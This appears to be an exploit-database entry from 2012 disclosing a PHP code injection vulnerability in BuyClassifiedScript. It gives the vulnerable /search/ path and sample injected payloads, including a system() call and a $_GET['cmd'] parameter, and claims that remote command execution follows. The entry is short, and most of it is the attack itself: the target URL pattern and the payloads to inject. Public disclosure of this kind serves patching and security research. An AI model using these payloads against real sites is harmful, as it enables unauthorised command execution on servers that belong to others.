EXPLOITS

BuyClassifiedScript - PHP Code Injection

Author: d3b4g
type: webapps
platform: php
port: 
date_added: 2012-11-26  
date_updated: 2012-11-26  
verified: 1  
codes: OSVDB-87875  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22929.txt  

# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------

     This vulnerability  allows an attacker to inject custom code
     into the server side scripting engine.It's possible to get a remote cmd by taking
     advantage of this vulnerability.


     Vulnerable function:

     /search/


     () php code excution :


     http://localhost/path/search {Inject malicious code}


     () example of code you can inject:


     //  ${@system(ls)}

        ${@print(hello)}

        $_GET['cmd']


                         //



-end-